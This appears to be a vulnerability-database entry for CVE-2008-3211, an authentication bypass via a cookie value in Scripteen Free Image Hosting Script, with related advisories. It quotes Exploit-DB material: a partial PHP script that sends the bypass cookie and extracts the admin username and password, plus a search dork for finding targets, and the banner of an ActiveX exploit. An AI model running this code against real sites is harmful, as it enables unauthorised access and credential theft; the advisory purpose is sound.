CVE-2008-3211
Published 2008-07-18
Priority P3 · 52 · high · CVSS 2.0 7.5
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.26% (86.8th percentile)
Scripteen Free Image Hosting Script 1.2 and 1.2.1 allows remote attackers to bypass authentication and gain administrative access by setting the cookid cookie value to 1.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scripteen | free_image_hosting_script | — | — |
| scripteen | free_image_hosting_script | — | — |
| scripteen | free_image_hosting_script | — | — |
GHSA
GHSA-3w8m-pw3c-4478: admin/header
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-4987 [HIGH] CWE-287 GHSA-3w8m-pw3c-4478: admin/header
admin/header.php in Scripteen Free Image Hosting Script 2.3 allows remote attackers to bypass authentication and gain administrative access by setting the cookgid cookie value to 1, a different vector than CVE-2008-3211.
GHSA
GHSA-qjq6-qxx8-cgh5: Scripteen Free Image Hosting Script 1
ghsa_unreviewed·2022-05-01
CVE-2008-3211 [HIGH] CWE-287 GHSA-qjq6-qxx8-cgh5: Scripteen Free Image Hosting Script 1
Scripteen Free Image Hosting Script 1.2 and 1.2.1 allows remote attackers to bypass authentication and gain administrative access by setting the cookid cookie value to 1.
No detection rules found.
Exploit-DB
Phoenician Casino FlashAX - ActiveX Remote Code Execution
exploitdb·2008-12-17
CVE-2008-5691 Phoenician Casino FlashAX - ActiveX Remote Code Execution
---
####################### Phoenician Casino FlashAX ActiveX Remote Code Execution FTW! #########
######By: e.wiZz!
######Blog: kidnap't by government .ba
######Business mail :) [email protected]
######Info: you can erase my blog,arrest me,do whatever...i'm still Bosnian Idiot FTW!.
######Greetz: Coolest guys around: aluigi,shinnai and hakin9.org
In the wild....
#############################################################
Author will be responsible for anything you do with calc.exe
#############################################################
ProductName FlashAX Module
ProductVersion 1.0.0.7
Report for Clsid: {D8089245-3211-40F6-819B-9E5E92CD61A2}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObj
Exploit-DB
Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber
exploitdb·2008-07-13
CVE-2008-3212 Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber
---
Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit
Coded By RMx - Liz0ziM
Web:www.biyosecurity.com
Dork:"Powered by Scripteen Free Image Hosting Script V1.2"
TARGET HOST:
Example:www.xxxx.com
TARGET PATH:
Example:/ or /scriptpath/
Sending Exploit..';
$packet ="GET ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cookid=1\r\n";
$packet.="Connection: Close\r\n\r\n";
yolla($host,$packet);
preg_match_all($desen,$veri,$cik);
$ad=$cik[1][0];
$sifre=$cik[1][1];
if($ad AND $sifre){
echo '
Exploit succeeded...
Admin Username:'.$ad.'
Admin Password:'.$sifre.'';
}
else
{
echo 'Exploit Failed !';
}
}
?>
# milw0rm.com [2008-07-13]
No writeups or analysis indexed.
http://secunia.com/advisories/31083
http://securityreason.com/securityalert/4014
http://www.securityfocus.com/bid/30217
http://www.vupen.com/english/advisories/2008/2106/references
https://exchange.xforce.ibmcloud.com/vulnerabilities/43771
https://www.exploit-db.com/exploits/6070